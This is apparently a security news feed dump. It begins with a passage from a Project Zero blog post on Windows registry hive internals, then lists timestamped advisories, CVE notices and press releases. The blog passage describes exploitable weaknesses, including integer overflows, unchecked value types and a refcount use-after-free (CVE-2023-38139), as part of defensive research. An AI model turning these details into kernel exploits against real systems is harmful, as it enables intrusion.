nt!_CM_KEY_VALUE    +0x000 Signature        : Uint2B    +0x002 NameLength       : Uint2B    +0x004 DataLength       : Uint4B    +0x008 Data             : Uint4B    +0x00c Type             : Uint4B    +0x010 Flags            : Uint2B    +0x012 Spare            : Uint2B    +0x014 Name             : [1] Wchar Let's examine each field more closely.Signature It identifies the cell as a key value, and must be equal to 0x6B76 ('vk'). It is verified during hive load, but isn't used for anything else later on.NameLength and Name The combination of these two fields specifies the name of the value: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer that stores the name itself. Let's consider the same criteria of the name that we have previously discussed in the context of registry keys: Compression: Similarly to keys, value names may be compressed if the VALUE_COMP_NAME (0x1) flag is set in _CM_KEY_VALUE.Flags. In that case, the string is stored as 8-bit ASCII characters, otherwise the normal wide-character encoding is used.Length: The length of the name can be between 0 and 16,383 characters. A length of zero indicates an alias for the value displayed by Regedit as "(Default)", a remnant of the design from Windows 3.1 where data was assigned directly to keys. As a sidenote, the correct enforcement of the upper limit was only introduced in October 2022 as a fix for CVE-2022-37991.Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a value name, with no exceptions. Since values are not part of the same namespace as keys, this even includes backslashes. The only constraint is that if the corresponding key is a symbolic link, then the value must be named "SymbolicLinkValue", as it has a special meaning and stores the link's target path. An example of a bug related to sanitizing value names was CVE-2024-26176.Uniqueness: Value name uniqueness is not enforced on input, but it is maintained by the kernel at runtime on a best-effort basis. That means that whenever setting a value, the system will always try to reuse an existing one with the same name before creating a new one. Similarly to keys, value lookup is performed in a case-insensitive manner, but the original casing is preserved and visible to the clients.DataLength Specifies the length of the data stored in the value. The various ranges of the 32-bit space that the field can fall into are explained below: DataLength Hive versions < 1.4 Hive versions ≥ 1.4 0x0 Empty value, `Data` must be set to HCELL_NIL. 0x1 – 0x3FD8 Data stored directly in a backing cell pointed to by `Data`. 0x3FD9 – 0xFFFFC Data stored directly in a backing cell pointed to by `Data`. Data split into 16344-byte chunks and saved in a big data object pointed to by `Data`. 0xFFFFD – 0x3FD7C028 Invalid. 0x3FD7C029 – 0x7FFFF000 Not accepted on input due to a 16-bit integer overflow in the big data chunk count. Feasible to set at runtime, but the saved data will be truncated due to the same bug / design limitation. 0x7FFFF001 – 0x7FFFFFFF Invalid 0x80000000 – 0x80000004 Between 0–4 bytes stored inline in the `Data` field. 0x80000005 – 0xFFFFFFFF Invalid.Data Responsible for storing or pointing to the data associated with the value. To summarize the table above, it can be in one or four states, depending on the data length and hive version: Empty – equal to HCELL_NIL, if DataLength is 0.Inline – stores up to four bytes in the Data member of the value cell itself, as indicated by DataLength & 0x7FFFFFFF, if the highest bit of DataLength is set. As a side effect, an empty value can be represented in two ways: either as DataLength=0 or DataLength=0x80000000.Raw data – points to a raw backing cell if Hive.Version < 1.4 or DataLength ≤ 0x3FD8.Big data – points to a big data structure introduced in hive version 1.4, which is capable of storing 0xFFFF × 0x3FD8 = 0x3FD7C028 bytes (a little under 1 GiB). More on big data cells in the section below.Type This field is supposed to store one of the supported value types, such as REG_DWORD, REG_BINARY, etc. We'll omit a thorough discussion of the official types, as we feel they are already well documented and understood. From a strictly technical point of view, though, it's important to note that the type is simply a hint, an extra piece of metadata that is available to a registry client with the intended purpose of indicating the nature of the value. However, Windows provides no guarantees with regards to the consistency between the value type and its data. For instance, a REG_DWORD value doesn't have to be four-bytes long (even though it conventionally is), a REG_SZ unicode string can have an odd length, and so on. Any client application that operates on user-controlled data from the registry should always check the specific properties it relies on, instead of unconditionally trusting the value type. Beyond this flexibility in data interpretation, there's another aspect of the Type field to consider: its potential for misuse due to its 32-bit width. The kernel generally doesn't perform any verification that its numerical value is one of the small, predefined enums (other than to ensure REG_LINK for symbolic links and REG_NONE for tombstone values), so it is possible to set it to any arbitrary 32-bit value, and have it returned in exactly the same form by system APIs such as RegQueryValueEx. If a program or driver happens to use the value type returned by the system as a direct index into an array without any prior bounds checking, this could lead to out-of-bounds reads or memory corruption. In some sense, it would probably be safest for the most critical/privileged software in the system (e.g. antivirus engines) not to use the value type at all, or only within a very limited scope.Flags There are currently two supported flags that can be set on registry values:VALUE_COMP_NAME (0x1) – equivalent to KEY_COMP_NAME, indicates that the value name representation is a tightly packed string of ASCII characters.VALUE_TOMBSTONE (0x2) – used exclusively in differencing hives (version 1.6) to indicate that a value with the given name has been explicitly deleted and doesn't exist on this key layer. It requires that the value type is REG_NONE and it doesn't contain any data. It is equivalent to the Tombstone (1) property of a key set in the LayerSemantics field of a key node.Spare Unused member, never accessed by the kernel.Big data value storage Prior to hive version 1.4, the maximum length of a value in the registry was 1 MB, which was directly related to the maximum length of the single backing cell that would store the raw data. This limitation is documented in the Registry element size limits article: Registry element Size limit ValueAvailable memory (latest format) [editor's note: this is not fully accurate]1 MB (standard format) Here, "standard format" refers to regf v1.3. On some level, 1 MB could be considered a reasonable limit, as the registry was not designed to serve as storage for large quantities of data – at least not initially. One example of a public resource which vocalized this design decision was the old Windows registry information for advanced users article from around 2002-2003, which stated: Long values (more than 2,048 bytes) must be stored as files with the file names stored in the registry. Nevertheless, it seems that at some point during the development of Windows XP, Microsoft decided to provide the registry clients with the ability to store larger chunks of data, not bound by the somewhat arbitrary limits of the regf format. In order to facilitate this use case, a new cell type was added, called the "big data". Conceptually, it is simply a means of dividing one long data blob into smaller portions of 16344 bytes, each stored in a separate cell. It replaces the single backing cell with a _CM_BIG_DATA structure defined as follows: 0: kd> dt _CM_BIG_DATA nt!_CM_BIG_DATA    +0x000 Signature        : Uint2B    +0x002 Count            : Uint2B    +0x004 List             : Uint4B The signature is set to 0x6264 ('db') and verified on hive load, but otherwise not used. The count represents the number of 16344-byte chunks making up the overall value, and is generally supposed to be set to an integer between 2–65535. Otherwise, if it was set to 0, that would mean that the value is empty so the big data object shouldn't be present at all. If it was equal to 1, a direct backing buffer should have been used instead, so such a construct would also be invalid. Neither zero nor one are thus accepted by the hive loader, but it is technically possible to set these values at runtime by abusing the aforementioned integer overflow bug. We haven't found any security impact of this behavior other than it being a correctness error, though. The last element of the structure, List, is a cell index to a basic array of cell indexes making up the value chunks. Its format is equivalent to that of the value list, which also stores just the HCELL_INDEX values without any headers or additional information. Furthermore, every chunk other than the last one must contain exactly 16344 bytes. If the length of the overall value is not divisible by 16344, the final chunk contains the remaining 1–16343 bytes. The layout of the big data object and its associated cells is shown in the diagram below: This concludes the part about the internal format of registry hives.The hive loading and sanitization process The hive loading process implemented by the NtLoadKey* family of system calls is a long and complex operation. It involves opening the hive file, loading it in memory, verifying its integrity, optionally recovering state from transactional log files, allocating any related kernel objects, attaching the hive to the global registry tree, and optionally opening a handle to the hive root and returning it to the caller. In this blog post, we are particularly interested in the hive sanitization part. Understanding this portion of the registry code is like consulting the official specification – or even better, as the code doesn't lie and is essentially the ground truth of what is and isn't accepted as valid data. Furthermore, it provides us with a number of hints as to which properties of the format are imperative to the correct functioning of the database, and which ones are more conventional, and don't have any serious consequences even if broken. The goal of this section is to discuss the overall control flow of loading a hive and performing the initial pass of sanitization. By documenting which internal routines are responsible for which checks, we hope to make it easier for other security researchers to navigate the hive loading code, providing a good starting point for their own investigations. The registry, as a logical structure, is built on top of several lower-layer abstractions, each of which has a number of invariants that must hold in order for the hive to be considered valid, and in order for operations being performed on the hive to be safe. This is illustrated in the pyramid below, with the most foundational requirements placed at the bottom, and the increasingly more general aspects of hive integrity towards the top: Let's consider some examples of validity checks at each level, starting with the most fundamental ones: Hive header, bin and cell layout consistency Validity of the hive version, length, root cell index, flags in the header. Existence of at least one bin in the hive. Validity of each bin's header, particularly the file offset and size. Validity of cells: aligned to eight bytes, within the bounds of the bin, completely filling out the bin. Intra-cell consistency Sufficient size of each cell with regards to the data it stores: at least the minimum size for the cell type (e.g. 0x4e for the key node), plus adequate to any variable-length internal arrays, such as the key name or value name. Correct signatures being set for every kind of cell depending on its function. Valid combinations of flags being set in key nodes and values. Strings (key names, value names) adhering to the format requirements regarding minimum and maximum lengths, charset, etc. Inter-cell consistency Valid references to cells in cell indexes, and each allocated cell only being used for one specific purpose. Consistency between copies of redundant data in separate cells: e.g. _CM_KEY_NODE.SubKeyCounts[...] vs. the length of the subkey index. Consistency between length markers in one cell vs. the amount of data stored in the corresponding backing buffer (e.g. _CM_KEY_VALUE.DataLength vs. length of the data stored in the raw data cell / big data cell). Correct hints in subkey indexes (fast leaves, hash leaves). Correct reference counts in the security descriptors. Structural correctness of high-level constructs Consistency of the linked list of security descriptors. Subkeys being laid out in a lexicographical order in all subkey indexes. Symbolic link keys having a single value named "SymbolicLinkValue" of type REG_LINK. Subkeys in the stable space always having a non-volatile parent. Correctness of global hive properties Each hive always containing at least one key (the root key) and at least one security descriptor. Only the root of the hive, and no other key having the KEY_HIVE_ENTRY flag set. The depth of the hive's tree structure being a maximum of 512 levels. As we can see, there are a variety of constraints that require verification when loading a hive, with the more abstract ones relying on the lower-layer ones to be confirmed first. It explains why the process is by far the most complex operation one can perform on the registry, spanning across thousands of lines of code and dozens of functions. To better illustrate this process, I've outlined the most important hive validation functions below, indented to show their hierarchical relationships as they execute in the kernel: NtLoadKey* → CmLoadDifferencingKey → CmLoad(App)Key CmpCmdHiveOpen → CmpInitHiveFromFile → CmpCreateHive HvHiveStartFileBacked → HvLoadHive HvpGetHiveHeader HvAnalyzeLogFiles HvpPerformLogFileRecovery HvpRemapAndEnlistHiveBins HvpValidateLoadedBin HvpEnlistFreeCells CmCheckRegistry HvCheckHive HvCheckBin CmpValidateHiveSecurityDescriptors CmpCheckRegistry2 CmpCheckKey CmpCheckValueList CmpCheckLeaf CmpCheckLexicographicalOrder CmpCheckAndFixSecurityCellsRefcount CmpLoadKeyCommon CmpLinkHiveToMaster ObOpenObjectByName → ... ... → CmpParseKey → CmpDoParseKey CmpUpdateHiveRootCellFlags Here is a short summary of each of the above functions, according to my own analysis and understanding: Function name(s) Description NtLoadKey* The four syscall entry points for loading registry hives, as discussed in the previous post: NtLoadKey, NtLoadKey2, NtLoadKeyEx, NtLoadKey3. CmLoadDifferencingKey A generic function for loading hives – not just differencing ones but every kind, contrary to what the name might suggest. Other than the syscall handlers, it is also called by VrpPreLoadKey and VrpLoadDifferencingHive, which are parts of the VRegDriver. It is responsible for sanitizing the input flags, checking the privileges of the caller, calling registry callbacks, invoking specialized functions to actually load the hive, and opening a handle to the root of the hive if the caller requested it. CmLoadKey,CmLoadAppKey Functions implementing the core functionality of loading normal and app hives, respectively. They are responsible for coordinating lower-layer loading functions, resolving any conflicts related to the hive file / registry mount path, and inserting the hive-related objects into the corresponding kernel data structures. In terms of opening and validating the binary hive representation, they are virtually equivalent. CmpCmdHiveOpen,CmpInitHiveFromFile,CmpCreateHive Functions dedicated to opening the hive file on disk, loading it in memory, validating its integrity and allocating the internal kernel structures (_CMHIVE and other objects representing the hive). HvHiveStartFileBacked,HvLoadHive Common functions for loading and sanitizing the hive on the level of header, bins and cells (the lowest level of the pyramid). HvpGetHiveHeader Reads and validates the hive header, trying to determine if it is valid or corrupted, and whether the header or hive data need to be recovered from a log file. HvAnalyzeLogFiles,HvpPerformLogFileRecovery Two most important functions related to data recovery from log files: the first one determines which of the two files (.LOG1/LOG2) to use, and the second one actually applies the log file entries to the hive mapping in memory. HvpRemapAndEnlistHiveBins,HvpValidateLoadedBin,HvpEnlistFreeCells Functions responsible for re-mapping the hive after log file recovery, in order to ensure that every bin is mapped as a continuous block of memory. During the process, the validity of all bins and the layout of their cells is verified. CmCheckRegistry A generic function encompassing the verification of levels ≥ 2 of the pyramid, i.e. everything about the hive that defines its logical structure and is not related to memory management. If any self-healing occurs during the process, the function restarts its logic, so it may potentially take multiple iterations before a corrupted hive is fixed up and accepted as valid. HvCheckHive,HvCheckBin Two functions responsible for validating the bin headers and layout of their cells. As you may have noticed, this part of their functionality is redundant with HvpValidateLoadedBin and HvpEnlistFreeCells. The difference is that the earlier functions are used to cache information about the positions of free cells in the hive, to optimize the allocation process later on. On the other hand, the underlying purpose of HvCheckHive and HvCheckBin is to generate a bitmap object (RTL_BITMAP) that indicates the positions of allocated cells, in order to ensure the validity of cell indexes when sanitizing the hive, and to make sure that every cell is only used for a single purpose in the hive. As a side note, there is an amusing bug in HvCheckBin related to verifying cell size correctness, but it seems to be non-exploitable precisely because the same sanitization is correctly performed earlier in HvpEnlistFreeCells. CmpValidateHiveSecurityDescriptors The function traverses the linked list of security descriptor cells, and verifies its consistency (the correctness of the Flink/Blink indexes) and the validity of the security descriptor blobs. At the same time, it also caches information about the descriptors in internal kernel structures, so that they can be quickly looked up when verifying the _CM_KEY_NODE.Security fields, and later at system run time. CmpCheckRegistry2 A function responsible for performing a single attempt at validating the entire key structure. There are several possible return codes:STATUS_SUCCESS if the hive validation passes without problems,STATUS_REGISTRY_HIVE_RECOVERED if minor corruption was encountered, but it was successfully fixed in-place,STATUS_RETRY if a badly corrupted key was encountered and removed from its parent's subkey index. This causes CmCheckRegistry to restart the validation process from scratch.STATUS_REGISTRY_CORRUPT if the hive was found to be corrupted beyond repair.Other problem-specific error codes such as STATUS_NO_LOG_SPACE or STATUS_INSUFFICIENT_RESOURCES, which cause the loading process to be aborted. CmpCheckKey This is the central function in the hive sanitization process, with more than a thousand lines of code in decompiled output, and likely just as many in the original source code. It essentially checks the validity of all fields within a specific key node, and also orchestrates the validation of the value list and subkey index associated with the key. If there was one function I would recommend analyzing to better understand the regf format, it would be this one. CmpCheckValueList Checks the consistency of a value list, each of the value cells on the list, and their backing buffers / big data objects. CmpCheckLeaf Validates a specific leaf subkey index, i.e. one of 'li', 'lf', 'lh'. This includes checking the cell size, signature, validity of the subkey cell indexes and their hint values. CmpCheckLexicographicalOrder Compares the name of two consecutive subkeys to determine if the second one is lexicographically greater than the first, in order to ensure the right sorting of a subkey index. CmpCheckAndFixSecurityCellsRefcount Iterates over all security descriptors in the hive, compares their refcounts loaded from disk with the values independently re-calculated while sanitizing the key tree, and corrects them if they are unequal. Since November 2024, it also frees any unused security descriptors with the reference count set to zero (they had been previously allowed, as described in WinRegLowSeverityBugs issue #10). CmpUpdateHiveRootCellFlags The function makes sure that the root key of the hive has the KEY_NO_DELETE and KEY_HIVE_ENTRY flags set. Interestingly, these flags are the only aspect of the regf format that is not enforced directly while loading the hive (in CmpCheckKey), but only at a later stage when the hive is being mounted in the global registry view.Self-healing properties The Windows implementation of the registry has the unique property that it is self-healing: the system tries very hard to successfully load a hive even if it's partially corrupted. My guess is that the reason for this design was to make the mechanism resilient against random data corruption on disk, as failure to load a system hive early during start-up would make Windows unusable. Perhaps it was decided that it was a better tradeoff to forcefully remove the broken parts of the file, with the hope that they would be automatically re-created later at run time, or that they weren't very important to begin with and the system/applications could continue to function correctly without them. And even if not, giving the user a chance to troubleshoot the problem or recover their data would still be a better outcome than bricking the machine completely. Consequently, whenever an error is detected by the hive loading logic, it is handled in one of several ways, depending on the nature of the problem: Bin recreation: if HvpValidateLoadedBin indicates that any part of a bin header is corrupted, then HvpRemapAndEnlistHiveBins re-initializes it from scratch, and declares it as 4096 bytes long (regardless of the previous length).Cell recreation: if HvpEnlistFreeCells detects a cell with an invalid length, it converts it to a single free cell spanning from the current offset until the end of the bin, potentially erasing any other data/cells previously residing in that region.Small, direct fix: if a single field within a key node is found to have an invalid state, and the good/expected state is known to the kernel, the problem gets fixed by directly overwriting the old value with the correct one. Examples include cell signatures and mandatory/illegal flags.Single value deletion: if any inconsistencies are found in a value cell or its associated data cell(s), the specific value is removed from the key's value list.Deletion of entire value list: if the descriptor of a value list (i.e. its cell index or length) are invalid, or if a symbolic link contains more than one value, the entire value list of the key is cleared.Single key deletion: if an irrecoverable problem is found within a key node (e.g. invalid cell index, invalid cell length, invalid name), then it is removed from its parent's subkey index, and the key tree validation process is restarted from scratch.Deletion of entire subkey index: if any irrecoverable problem is found in a subkey index, it is deleted, and the subkey list of its associated key is cleared.Security descriptor list reset: if any errors are detected in the list of security descriptors (bad Flink/Blink indexes or invalid binary format), the set of descriptors in the hive is reduced to the single root descriptor, which will then be inherited by all the keys in the hive.Rejection of entire hive: if any issues are found with the fundamental parts of the regf format or its properties (heavily corrupted header, missing bins, invalid root key, invalid root security descriptor), the loading of the hive is completely aborted. As we can see, Windows implements a very defensive strategy and always attempts to either fix the corrupted data, or isolate the damage by deleting the affected object while preserving the overall hive integrity. Only when these repair attempts are exhausted does the kernel abort the loading process and return an error. This resilience can lead to situations where a freshly loaded hive is already in a "dirty" state, requiring the system to immediately flush its self-applied corrections to disk to maintain consistency. One particularly interesting bug related to the self-healing process was CVE-2023-38139. To reproduce the issue, the self-healing logic would have to be triggered a large number of times (in the case of my PoC, 65535 times) in order to cause a 32-bit integer overflow of a security descriptor refcount, and later a UAF condition. I have also abused the behavior to demonstrate WinRegLowSeverityBugs #13, in which a key with an empty name would be removed during load, freeing up a reference to a security descriptor and resulting in the refcount being equal to zero upon loading. Overall, the self-healing property of the registry is not the most critical, but one that I find quite fascinating and certainly worth keeping in mind as part of one's toolbox when researching this subsystem.Conclusion Congratulations on reaching the end! This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered. Hopefully, this deep dive clarifies some of the intricacies of the hive format and complements existing unofficial documentation. Keep in mind that hives store their data in the regf files on disk, but Windows also creates multiple auxiliary kernel objects for managing and caching this data once loaded. The next post in the series will discuss these various objects, their relationships, lifecycle, and, naturally, their impact on system security. Stay tuned!

https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html
DigiEver Fix That IoT Thing!
2024-12-19T15:00:00Z | 1734620400

https://www.akamai.com/blog/security-research/2024/dec/digiever-fix-that-iot-thing
Hillstone Networks celebrates cybersecurity successes and anticipates an innovative future toward 2025
2024-12-19T15:00:00Z | 1734620400

Santa Clara, California, December 19, 2024 /PRNewswire/ –Hillstone Networks, a leading provider of cybersecurity solutions, proudly reflects on its key achievements in 2024, marking another year of sustained growth and expansion. With a focus on innovation and proactive protection against cyber threats, the company continues to strengthen its commitment to securing organizations worldwide. Key achievements in 2024 […] The post Hillstone Networks celebrates cybersecurity successes and anticipates an innovative future toward 2025 appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-celebrates-cybersecurity-successes-and-anticipates-an-innovative-future-toward-2025/
AVANT and Akamai: Solving Security Challenges for Financial Services
2024-12-19T14:00:00Z | 1734616800

Read why AVANT?s Trusted Advisors recommend to their clients Akamai?s award-winning solutions in cloud computing, cybersecurity, and application protection.

https://www.akamai.com/blog/partners/2024/dec/avant-akamai-solving-security-challenges-financial-services
Clavister Enters Naval Domain through 8 MSEK Contract with Major Nordic Defence Company
2024-12-19T13:29:19Z | 1734614959

19 December 2024 – Örnsköldsvik, Sweden – Clavister, a leader in European cybersecurity for mission-critical applications, announced today that it has been approved as supplier to a major Nordic defence… Read more The post Clavister Enters Naval Domain through 8 MSEK Contract with Major Nordic Defence Company appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-enters-naval-domain-through-8-msek-contract-with-major-nordic-defence-company/
Is the Recent Quantum Hype by Google Willow’s Chip a Threat to RSA Algorithm?
2024-12-19T13:17:39Z | 1734614259

Recently, Google made headlines with the announcement of its new quantum chip, Willow, marking another step forward in the fascinating world of quantum computing. The technology promises to solve problems that are currently intractable for classical computers, fueling excitement—and a fair bit of concern—about its implications for cryptography, particularly the widely used RSA encryption. Cato... The post Is the Recent Quantum Hype by Google Willow’s Chip a Threat to RSA Algorithm?   appeared first on Cato Networks.

https://www.catonetworks.com/blog/is-recent-quantum-hype-by-google-willows-chip-a-threat-to-rsa-algorithm/
Black Duck Welcomes New CIO, CISO in Latest Executive Expansion Moves
2024-12-19T13:00:00Z | 1734613200

Ishpreet Singh named CIO, joins executive leadership team from Qualys; Bruce Jenkins promoted internally to CISO, further bolstering vision of growth and innovation BURLINGTON, Mass., Dec. 19,...

https://news.blackduck.com/2024-12-19-Black-Duck-Welcomes-New-CIO,-CISO-in-Latest-Executive-Expansion-Moves
Vulnerability in Govee Home mobile application (Android & iOS)
2024-12-19T11:00:00Z | 1734606000

Incorrect Authorization vulnerability (CVE-2023-4617) has been found in Govee Home mobile application on Android and iOS.

https://cert.pl/en/posts/2024/12/CVE-2023-4617/
Unwrapping Christmas scams | Unlocked 403 cybersecurity podcast (special edition)
2024-12-19T10:01:32Z | 1734602492

ESET's Jake Moore reveals why the holiday season is a prime time for scams, how fraudsters prey on victims, and how AI is supercharging online fraud

https://www.welivesecurity.com/en/videos/christmas-scams-unlocked-403-cybersecurity-podcast-ep-9/
NCSC statement following exploitation of Unitronics programmable logic controllers
2024-12-19T09:43:08Z | 1734601388

NCSC supports mitigation advice in advisory regarding exploitation of Unitronics programmable logic controllers used in the water sector and across a range of other industries.

https://www.ncsc.gov.uk/news/ncsc-statement-following-exploitation-of-unitronics-programmable-logic-controllers
Security Alert (A24-12-15): Multiple Vulnerabilities in Google Chrome
2024-12-19T04:00:00Z | 1734580800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Recent Cases of Watering Hole Attacks, Part 1
2024-12-19T02:00:00Z | 1734573600

Nowadays, many people probably recognize exploit of vulnerabilities in publicly exposed assets such as VPN and firewalls as the attack vector. In fact, many security incidents reported to JPCERT/CC also involve such devices. This is because vulnerabilities in VPN devices...

https://blogs.jpcert.or.jp/en/2024/12/watering_hole_attack_part1.html
Relatório Cibersegurança em Portugal, tema Sociedade já disponível
2024-12-19T00:00:00Z | 1734566400

O Relatório Cibersegurança em Portugal, tema Sociedade 2024, desenvolvido pelo Observatório de Cibersegurança do Centro Nacional de Cibersegurança (CNCS) analisa as atitudes, comportamentos e a educação e sensibilização no âmbito da cibersegurança, com base em dados de 2023 e de 2024, apresentando conclusões e identificando algumas recomendações estratégicas para organizações e indivíduos. Este estudo, que vai na 6.ª edição, sistematiza dados disponíveis sobre matérias ligadas à cibersegurança, tais como do Eurostat e da Direção-Geral de Estatísticas da Educação e Ciência (DGEEC), e recolhe outros de fontes abertas ou de inquéritos à comunidade, nomeadamente os relativos à sensibilização e educação. Das principais conclusões dentro dos domínios analisados, destaca-se: Exposição: elevada exposição digital dos utilizadores e organizações à internet e certos serviços digitais; Nível de interesse do tema: destaque crescente nos media e índices de pesquisa online de ciberameaças relevantes ligadas ao fator humano; Atitudes e comportamentos: elevada sensibilidade das organizações relativamente à cibersegurança, embora tenham poucos recursos internos; Sensibilização e educação: pouco uso de meios de grande alcance para campanhas de sensibilização em cibersegurança, mas maior investimento das organizações em ações dirigidas aos colaboradores. Continua a aumentar o número de cursos e alunos de cibersegurança no ensino superior. Face aos riscos e vulnerabilidades associados às tendências, o relatório identifica recomendações para as organizações e indivíduos: Associar a literacia digital nas escolas e outros contextos educativos a uma literacia para a cibersegurança; Promover boas práticas nas organizações, como o múltiplo fator de autenticação (MFA), de forma mais acentuada; Capacitar mais os recursos das organizações em cibersegurança, nomeadamente na Administração Pública e pequenas e médias empresas (PME); Aumentar o alcance das ações de sensibilização chegando a um público mais alargado. Consulte a versão integral do estudo.Consulte a versão do estudo em 15 minutos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135907/relatorio-ciberseguranca-em-portugal-tema-sociedade-ja-disponivel
Assured Cyber Incident Response scheme – important updates
2024-12-18T15:52:57Z | 1734537177

We’ve updated the CIR 'Enhanced Level' scheme standard and will be ready to accept applications in the new year.

https://www.ncsc.gov.uk/blog-post/assured-cir-updates
Clavister Awarded 53 MSEK Contract by BAE Systems Hägglunds to Supply CyberArmour to the CV90 Platform
2024-12-18T15:46:40Z | 1734536800

18 December 2024 – Örnsköldsvik, Sweden – Clavister, a leader in European cybersecurity for mission-critical applications, announced today that it has been awarded a contract worth  53 MSEK to provide… Read more The post Clavister Awarded 53 MSEK Contract by BAE Systems Hägglunds to Supply CyberArmour to the CV90 Platform appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-awarded-53-msek-contract-by-bae-systems-hagglunds-to-supply-cyberarmour-to-the-cv90-platform/
The Benefits of Serverless Computing Architecture
2024-12-18T13:00:00Z | 1734526800

https://www.akamai.com/blog/cloud/2024/dec/the-benefits-of-serverless-computing-architecture
Vulnerabilities in Wapro ERP Desktop software
2024-12-18T11:00:00Z | 1734519600

CERT Polska has received a report about 2 vulnerabilities ( CVE-2024-4995 and CVE-2024-4996) found in Wapro ERP Desktop software from Asseco Business Solutions.

https://cert.pl/en/posts/2024/12/CVE-2024-4995/
Cybersecurity is never out-of-office: Protecting your business anytime, anywhere
2024-12-18T10:00:00Z | 1734516000

While you're enjoying the holiday season, cybercriminals could be gearing up for their next big attack – make sure your company's defenses are ready, no matter the time of year

https://www.welivesecurity.com/en/business-security/cybersecurity-never-out-of-office-protecting-business-anytime-anywhere/
CVE-2024-12373
2024-12-18T08:05:00Z | 1734509100

CWE-120 BUFFER COPY WITHOUT CHECKING SIZE OF INPUT ('CLASSIC BUFFER OVERFLOW'): A denial-of-service vulnerability exists in the affected product. The vulnerability results in a buffer overflow, potentially causing denial-of-service condition. Rockwell Automation has corrected these problems in firmware revision 4.020 and recommends users upgrade to the latest version available.

https://claroty.com/team82/disclosure-dashboard/cve-2024-12373
CVE-2024-12372
2024-12-18T08:03:00Z | 1734508980

CWE-122 HEAP-BASED BUFFER OVERFLOW: A denial-of-service and possible remote code execution vulnerability exists in the affected product. The vulnerability results in the corruption of the heap memory, which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack. Rockwell Automation has corrected these problems in firmware revision 4.020 and recommends users upgrade to the latest version available.

https://claroty.com/team82/disclosure-dashboard/cve-2024-12372
CVE-2024-12371
2024-12-18T08:02:00Z | 1734508920

CWE-420 UNPROTECTED ALTERNATE CHANNEL: A device takeover vulnerability exists in the affected product. This vulnerability allows configuration of a new Policyholder user without any authentication via API. Policyholder user is the most privileged user that can perform edit operations, creating admin users and performing factory reset. Rockwell Automation has corrected these problems in firmware revision 4.020 and recommends users upgrade to the latest version available.

https://claroty.com/team82/disclosure-dashboard/cve-2024-12371
Кібератака UAC-0125 з використанням тематики "Армія+" (CERT-UA#12559)
2024-12-18T06:38:45Z | 1734503925

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA 17.12.2024 від фахівців MIL.CERT-UA отримано інформацію щодо виявлення низки вебресурсів, які імітують офіційну сторінку для отримання додатку "Армія+" та опубліковані за допомогою сервісу Cloudlfare Workers.

https://cert.gov.ua/article/6281701
Security Alert (A24-12-14): Multiple Vulnerabilities in Apache Tomcat
2024-12-18T04:00:00Z | 1734494400

The Apache Software Foundation released security updates to address the vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Fraud Funding Terrorism? The Cost of Missing Sanctioned Connections in a Globalized Fraud Ecosystem
2024-12-18T00:00:00Z | 1734480000

Editor's note: The following blog post originally appeared on Levi Gundert's Substack page.IntroductionA past conversation with an undercover federal agent who specializes in money laundering revealed staggering amounts of currency moving across geographic boundaries, skirting traditional Anti-Money Laundering (AML) processes. From local and transnational crime syndicates to presidential spouses and those looking to evade sanctions or tax regimes, the need to wash and move illicit funds into reputable banking channels has never been greater. The FTs recent AML coverage highlights the scale of the problem and provides timely background reading on money laundering networks, suspects, and indictments. One story is particularly relevant as it centers around proof of address compliance failures. Coincidentally, address verification is precisely the problem highlighted by a recent Recorded Future Payment Fraud Intelligence (PFI) report.Big Fraud and a Hong Kong AddressThe address in question is:12th Floor, San Toi Building,137-139Connaught Road Central, Hong KongThe San Toi Building (and 12th-floor visual estimate) provided by Google MapsThe address is linked to two scam website (fraud) clustersdesignated Misspelled and Brand as a Coverwhich share merchant accounts and payment processing logic. The three merchant accounts include CAMHUBSTORE, AQAPAY*xmvmxft, SMARTTECHHK, and gracefashionhub. Hundreds, if not thousands, of scam websites are connected to these merchants.A scam website snapshot. A victim articulates why Camhubstore is a scam site. These merchant accounts that process payments for fraudulent, non-existent goods are tied to the 12th floor of the San Toi Building as the registered business address. The address is even placed directly on some of the sites as a contact address. Heres where it gets interesting. The address is listed on the U.S. Treasury OFAC list for ties to an Iranian terrorism group. The 12th floor is presumably large enough to house multiple businesses and likely sufficiently small such that businesses transit through reasonably often. Of course, it would be difficult to draw a direct connection between these merchant accounts and terrorism based on a shared space address. Still, other questions remain, namely: how are these scam merchants acquiring the ability to process payment cards when their physical address is on the OFAC list? Remedying AML / KYC Compliance FailuresKnowing your customer (KYC) might be difficult when bad actors go to great lengths to obscure their identity and purpose, but this is an egregious case of acquiring banks and payment processors missing obviously problematic contact details.Geoff Whites book, The Lazarus Heist, documented that even routine checks can lead to better outcomes. In it, White details North Korean hackers' inability to transfer a more significant amount (hundreds of millions of dollars) from Bangladesh Bank to a bank branch in Manila because the branch is located on Jupiter Street, and "Jupiter is also the name of a sanctioned Iranian shipping vessel. Addresses matter. Suppose the US pursues a more friendly regulatory environment for cryptocurrencies under President Trump, and exchanges find it easier to acquire bank accounts. In that case, the potential for money laundering may explode without rigorous AML / KYC / KYT efforts. The SEC may have fewer teeth, but banks and processors are still gambling if anyone can obtain a merchant account with little to no compliance checks. Indeed, the business incentives are aligned to offer maximum merchant accounts to generate more processing fees, and historically, compliance 